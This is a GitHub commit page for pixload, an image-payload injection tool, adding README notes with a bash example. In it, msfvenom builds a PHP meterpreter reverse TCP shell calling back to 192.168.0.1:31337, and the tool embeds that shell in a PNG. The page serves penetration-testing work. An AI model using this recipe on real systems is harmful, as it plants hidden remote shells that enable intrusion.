Skip to content

Commit

Permalink
README.md: mention about msfvenom
Browse files Browse the repository at this point in the history
  • Loading branch information
sighook committed Jul 29, 2020
1 parent facd742 commit 3035bab
Show file tree
Hide file tree
Showing 2 changed files with 13 additions and 0 deletions.
13 changes: 13 additions & 0 deletions README.md
Original file line number Diff line number Diff line change
Expand Up @@ -6,6 +6,8 @@ Set of tools for ~~hiding backdoors~~ creating/injecting payload into images.

The following image types are currently supported: BMP, GIF, JPG, PNG, WebP.

#### about

Useful references for better understanding of `pixload` and its use-cases:

- [Bypassing CSP using polyglot JPEGs](https://portswigger.net/blog/bypassing-csp-using-polyglot-jpegs)
Expand All @@ -23,6 +25,17 @@ both valid x86 shellcode and a valid image file, I recommend you to look
[here](https://warroom.securestate.com/bmp-x86-polyglot/) and
[here](https://github.com/rapid7/metasploit-framework/blob/master/modules/encoders/x86/bmp_polyglot.rb).

#### msfvenom

If you want to inject a metasploit payload, try something like this:

```bash
msfvenom -p php/meterpreter_reverse_tcp \
LHOST=192.168.0.1 LPORT=31337 -f raw > payload.php
# Edit payload.php if need.
./pixload/png.pl -payload "$(cat payload.php)" -output payload.png
```

## SETUP

The following Perl modules are required:
Expand Down
Binary file removed btc-qrcode.png
Binary file not shown.

0 comments on commit 3035bab

Please sign in to comment.